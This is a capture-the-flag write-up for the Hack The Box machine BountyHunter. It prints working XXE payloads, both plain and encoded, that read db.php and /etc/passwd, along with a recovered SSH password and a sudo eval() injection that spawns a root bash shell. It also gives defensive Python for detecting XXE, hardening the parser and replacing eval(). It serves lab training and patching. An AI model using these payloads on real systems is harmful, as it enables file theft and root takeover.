Bounty Hunter Hackthebox Writeup


Nmap

As usual, I start with an Nmap scan:

 # Nmap 7.80 scan initiated Sun Jul 25 09:14:32 2021 as: nmap -sV -sC -vv -oN nmap 10.10.11.100  
 Nmap scan report for 10.10.11.100  
 Host is up, received echo-reply ttl 63 (0.28s latency).  
 Scanned at 2021-07-25 09:14:33 IST for 25s  
 Not shown: 998 closed ports  
 Reason: 998 resets  
 PORT  STATE SERVICE REASON     VERSION  
 22/tcp open ssh   syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
 80/tcp open http  syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))  
 |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.41 (Ubuntu)  
 |_http-title: Bounty Hunters  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
 Read data files from: /usr/bin/../share/nmap  
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
 # Nmap done at Sun Jul 25 09:14:58 2021 -- 1 IP address (1 host up) scanned in 25.85 seconds  


Only two ports are open:

22 is SSH

80 is HTTP

ENUMERATION

First, let's check what is on port 80.

No CMS; it's a simple Bootstrap site.

So I am using ffuf for directory brute forcing. You can also use gobuster, wfuzz, whatever you want... :)

FFUF

     /'___\ /'___\      /'___\      
     /\ \__/ /\ \__/ __ __ /\ \__/      
     \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
     \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
      \ \_\  \ \_\ \ \____/ \ \_\      
      \/_/  \/_/  \/___/  \/_/      
     v1.3.1-dev  
 ________________________________________________  
  :: Method      : GET  
  :: URL       : http://10.10.11.100/FUZZ  
  :: Wordlist     : FUZZ: /usr/share/wordlists/common.txt  
  :: Extensions    : .php   
  :: Follow redirects : false  
  :: Calibration   : false  
  :: Timeout     : 10  
  :: Threads     : 40  
  :: Matcher     : Response status: 200,204,301,302,307,401,403,405  
 ________________________________________________  
 .php          [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 410ms]  
             [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 409ms]  
 .htpasswd.php      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3520ms]  
 .htaccess        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 .htaccess.php      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]  
 .hta.php        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 .htpasswd        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4703ms]  
 .hta          [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 4702ms]  
 assets         [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 237ms]  
 css           [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 408ms]  
 db.php         [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 515ms]  
 index.php        [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 611ms]  
 index.php        [Status: 200, Size: 25169, Words: 10028, Lines: 389, Duration: 412ms]  
 js           [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 613ms]  
 portal.php       [Status: 200, Size: 125, Words: 11, Lines: 6, Duration: 251ms]  
 resources        [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 613ms]  
 server-status      [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 291ms]  

Lots of files are listed there.

portal.php says it is under development, ok... and I follow the link it gives.

Bounty Report System beta: yep, it's under development.

I tried SQL injection but nothing worked, so I looked at the raw request and found something interesting.

What is the data value? It is base64-encoded text.

So I decided to decode that text; it looks like this:


 <?xml version="1.0" encoding="ISO-8859-1"?>
 <bugreport>
 <title></title>
 <cwe></cwe>
 <cvss></cvss>
 <reward></reward>
 </bugreport>

XML?

OK, I decided to try some XXE injection.

What is XXE injection?

XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of an application.

It is also referred to as XXE (XML External Entity) injection.

For more, refer to this blog:

#synack

and also watch IppSec's DevOops video, where XXE is clearly explained on the DevOops machine:

#video-reference

I tried some payloads from PayloadsAllTheThings:


 <?xml version="1.0"?>  
 <!DOCTYPE foo [  
 <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>  
 <foo><result>&ac;</result></foo>  

It's an example payload from PayloadsAllTheThings.

I edited that payload for our machine; finally it looks like this:

SPOILER ALERT

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
 <bugreport>
 <title>&xxe;</title>
 <cwe>no</cwe>
 <cvss>no</cvss>
 <reward>no</reward>
 </bugreport>

Why read db.php?

Because we can already see every other file on that machine (index.php, portal.php), but db.php comes back empty. It is not really empty: it is a pure PHP file, so the server executes it and sends nothing to the browser. Reading it through php://filter with base64 encoding returns the source instead of executing it.

PHP is the backend language here :)

We need Burp to perform this attack.

Look at data:

That value is base64 + URL encoded, so we do the same to our payload.

Finally, the payload looks like this:

SPOILER ALERT

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj4gXT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT4meHhlOzwvY3dlPgoJCTxjdnNzPiZ4eGU7PC9jdnNzPgoJCTxyZXdhcmQ%2BJnh4ZTs8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D
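To make the encoding step concrete, here is an added Python example (mine, not from the write-up and not the portal's code) that reverses the portal's encoding of the data value, re-applies it, and, as a defender's check on a captured request, reports whether the decoded report carries a DOCTYPE and which external resources its entity declarations point at. The captured blob above is the input; the ordinary report used for comparison is constructed.

```python
import base64
import re
from urllib.parse import quote, unquote

# The portal's `data` value as captured in the write-up above: base64 of the
# XML, then URL-encoded ("+" -> %2B, "=" -> %3D).  Decoding it yields the
# payload that reads db.php through php://filter.
CAPTURED_DATA = (
    "PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4K"
    "PCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9ZGIucGhwIj4gXT4K"
    "CQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT4meHhlOzwvY3dlPgoJCTxjdnNzPiZ4eGU7PC9jdnNzPgoJCTxyZXdhcmQ%2BJnh4ZTs8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D"
)

# Constructed ordinary report, for comparison.
BENIGN_XML = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<bugreport>\n"
    "<title>Reflected XSS in search</title>\n"
    "<cwe>79</cwe>\n"
    "<cvss>6.1</cvss>\n"
    "<reward>500</reward>\n"
    "</bugreport>"
)

# Matches an external entity declaration and captures its name and resource.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(\S+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]+)"', re.IGNORECASE
)


def decode_data(data: str) -> str:
    """Undo the portal's encoding: URL-decode first, then base64-decode."""
    return base64.b64decode(unquote(data)).decode("iso-8859-1")


def encode_data(xml_text: str) -> str:
    """The forward direction the portal applies: base64, then URL-encode."""
    return quote(base64.b64encode(xml_text.encode("iso-8859-1")).decode("ascii"))


def inspect_data(data: str) -> dict:
    """Defender's view of one request: decode the parameter and report whether
    it carries a DTD and which external resources its entities reference."""
    xml_text = decode_data(data)
    return {
        "has_doctype": "<!DOCTYPE" in xml_text.upper(),
        "external_resources": [m.group(2) for m in ENTITY_RE.finditer(xml_text)],
    }


if __name__ == "__main__":
    print(decode_data(CAPTURED_DATA))
    print(inspect_data(CAPTURED_DATA))
    print(inspect_data(encode_data(BENIGN_XML)))
```

A bug report never needs a DTD, so a request whose decoded data contains a DOCTYPE at all is worth alerting on; the external_resources list is what you would log to see which file or wrapper was targeted.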



We have creds from db.php, but the username admin is incorrect. What is the username?

We grab the /etc/passwd file to find user names:


 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
 <bugreport>
 <title>&xxe;</title>
 <cwe>no</cwe>
 <cvss>no</cvss>
 <reward>no</reward>
 </bugreport>

The final payload looks like this (base64 + URL encoded):


 PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2Bbm88L2N3ZT4KCQk8Y3Zzcz5ubzwvY3Zzcz4KCQk8cmV3YXJkPm5vPC9yZXdhcmQ%2BCgkJPC9idWdyZXBvcnQ%2B  





Two users have a shell: one is root, and the other is development.

So I tried to log in as the development user with those creds:

ssh development@10.10.11.100

password: m19RoAU0hP41A1sTsq6K

We logged in successfully.



How to patch that vulnerability?

Simple: change libxml_disable_entity_loader(false); to

libxml_disable_entity_loader(true);

because the application loads external XML entities without sanitizing the input file.
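The same principle, refusing DTDs and entity substitution before the parser touches the document, shown in Python as an added example (this is not the portal's PHP and not code from the write-up). One caveat for PHP readers: libxml_disable_entity_loader() is deprecated since PHP 8.0, where external entity loading is already off unless LIBXML_NOENT is passed, so the durable fix is to never enable entity substitution and to reject any DOCTYPE in user-supplied XML. The field names come from the bug report XML above; both sample reports are constructed.

```python
import re
import xml.etree.ElementTree as ET

FIELDS = ("title", "cwe", "cvss", "reward")
# A bug report never needs a DTD, so any DOCTYPE or ENTITY declaration is
# refused up front.  XML keywords are upper-case; IGNORECASE is defence in depth.
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


def parse_bug_report(xml_text: str) -> dict:
    """Hardened parse of a report: refuse DTDs before the parser sees them,
    then pull only the four expected fields as plain text."""
    if DTD_RE.search(xml_text):
        raise ValueError("DTD / entity declarations are not accepted")
    root = ET.fromstring(xml_text)
    if root.tag != "bugreport":
        raise ValueError("unexpected root element %r" % root.tag)
    report = {}
    for field in FIELDS:
        node = root.find(field)
        report[field] = (node.text or "").strip() if node is not None else ""
    return report


def is_accepted(xml_text: str) -> bool:
    """True when the report parses under the hardened rules, False otherwise."""
    try:
        parse_bug_report(xml_text)
        return True
    except (ValueError, ET.ParseError):
        return False


# Constructed inputs: an ordinary report and one carrying the kind of external
# entity declaration used against the portal.
BENIGN_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<bugreport>\n"
    "<title>Reflected XSS in search</title>\n"
    "<cwe>79</cwe>\n"
    "<cvss>6.1</cvss>\n"
    "<reward>500</reward>\n"
    "</bugreport>"
)
XXE_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<bugreport><title>&xxe;</title><cwe>no</cwe><cvss>no</cvss><reward>no</reward></bugreport>"
)

if __name__ == "__main__":
    print(parse_bug_report(BENIGN_REPORT))
    print("XXE report accepted:", is_accepted(XXE_REPORT))
```

Rejecting the DTD outright is simpler and safer than trying to allow "harmless" entities: the moment a parser is permitted to substitute entities, any file or URL wrapper the process can reach becomes readable through a field that is echoed back, which is exactly what happened with db.php above.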


PRIVILEGE ESCALATION

sudo -l

We can run the ticketValidator.py file as the root user.

So let's view the ticketValidator.py file:



CODE

 #Skytrain Inc Ticket Validation System 0.1  
 #Do not distribute this file.  
 def load_file(loc):  
   if loc.endswith(".md"):  
     return open(loc, 'r')  
   else:  
     print("Wrong file type.")  
     exit()  
 def evaluate(ticketFile):  
   #Evaluates a ticket to check for ireggularities.  
   code_line = None  
   for i,x in enumerate(ticketFile.readlines()):  
     if i == 0:  
       if not x.startswith("# Skytrain Inc"):  
         return False  
       continue  
     if i == 1:  
       if not x.startswith("## Ticket to "):  
         return False  
       print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")  
       continue  
     if x.startswith("__Ticket Code:__"):  
       code_line = i+1  
       continue  
     if code_line and i == code_line:  
       if not x.startswith("**"):  
         return False  
       ticketCode = x.replace("**", "").split("+")[0]  
       if int(ticketCode) % 7 == 4:  
         validationNumber = eval(x.replace("**", ""))  
         if validationNumber > 100:  
           return True  
         else:  
           return False  
   return False  
 def main():  
   fileName = input("Please enter the path to the ticket file.\n")  
   ticket = load_file(fileName)  
   #DEBUG print(ticket)  
   result = evaluate(ticket)  
   if (result):  
     print("Valid ticket.")  
   else:  
     print("Invalid ticket.")  
   ticket.close  
 main()  

This code asks for a .md file, so make a file with the .md extension.

The Python code checks the first line for "# Skytrain Inc" and the second for "## Ticket to ", then, after a "__Ticket Code:__" line, takes the next line, strips the "**", and if the number before the "+" satisfies code % 7 == 4, it passes the whole line to eval(). That eval() is the bug: the rest of the line can be any Python expression, so we add a call to os.system('/bin/bash') there to pop a root shell.

So file.md looks like this:

 # Skytrain Inc   
 ## Ticket to root  
 __Ticket Code:__  
 **102+ 10 == 112 and __import__('os').system('/bin/bash') == False  


We rooted :)
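A hardened rewrite of the validation logic, as an added example that is not the box's ticketValidator.py: the same header, destination and ticket-code checks, but the code line is matched against a strict pattern and summed with int() instead of being handed to eval(), so a ticket line that smuggles an expression is rejected rather than executed. The ticket contents below are constructed.

```python
import os
import re
from typing import Optional

HEADER = "# Skytrain Inc"
DEST_PREFIX = "## Ticket to "
CODE_MARKER = "__Ticket Code:__"
# The only ticket-code shape accepted: "**<code>+<number>**" (closing "**"
# optional), which is what the original replace("**", "")/split("+") implied.
# Anything else is rejected without ever being evaluated.
CODE_LINE_RE = re.compile(r"^\*\*(\d+)\s*\+\s*(\d+)(?:\*\*)?\s*$")


def evaluate_ticket(text: str) -> Optional[str]:
    """Validate a ticket's text. Returns the destination when the ticket is
    valid and None otherwise; no eval() anywhere."""
    lines = text.splitlines()
    if len(lines) < 4:
        return None
    if not lines[0].startswith(HEADER) or not lines[1].startswith(DEST_PREFIX):
        return None
    destination = lines[1][len(DEST_PREFIX):].strip()
    for i in range(2, len(lines) - 1):
        if not lines[i].startswith(CODE_MARKER):
            continue
        m = CODE_LINE_RE.match(lines[i + 1])
        if m is None:
            return None  # not plain "<code>+<number>": reject, do not interpret
        ticket_code, extra = int(m.group(1)), int(m.group(2))
        if ticket_code % 7 == 4 and ticket_code + extra > 100:
            return destination
        return None
    return None


def load_ticket(path: str) -> Optional[str]:
    """Same .md gate as the original, but the path must also be a regular file
    (no symlinks) and the handle is actually closed."""
    if not path.endswith(".md") or os.path.islink(path) or not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8") as fh:
        return evaluate_ticket(fh.read())


# Constructed tickets: a legitimate one, one carrying an expression, and one
# whose code fails the modulo check.
VALID_TICKET = "# Skytrain Inc\n## Ticket to Paris\n__Ticket Code:__\n**102+10**\n"
EXPRESSION_TICKET = (
    "# Skytrain Inc\n## Ticket to root\n__Ticket Code:__\n"
    "**102+ 10 == 112 and print('never evaluated')\n"
)
WRONG_CODE_TICKET = "# Skytrain Inc\n## Ticket to Paris\n__Ticket Code:__\n**103+10**\n"

if __name__ == "__main__":
    for name, ticket in (("valid", VALID_TICKET),
                         ("expression", EXPRESSION_TICKET),
                         ("wrong code", WRONG_CODE_TICKET)):
        verdict = "Valid ticket." if evaluate_ticket(ticket) else "Invalid ticket."
        print(f"{name}: {verdict}")
```

Removing eval() is the fix that matters; the sudo rule still lets the user choose any .md path, so even the hardened script should not be run as root against user-writable files.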


5 Comments

  1. Wow! Thank you very much :D

  2. Thanks man... The post is very understandable.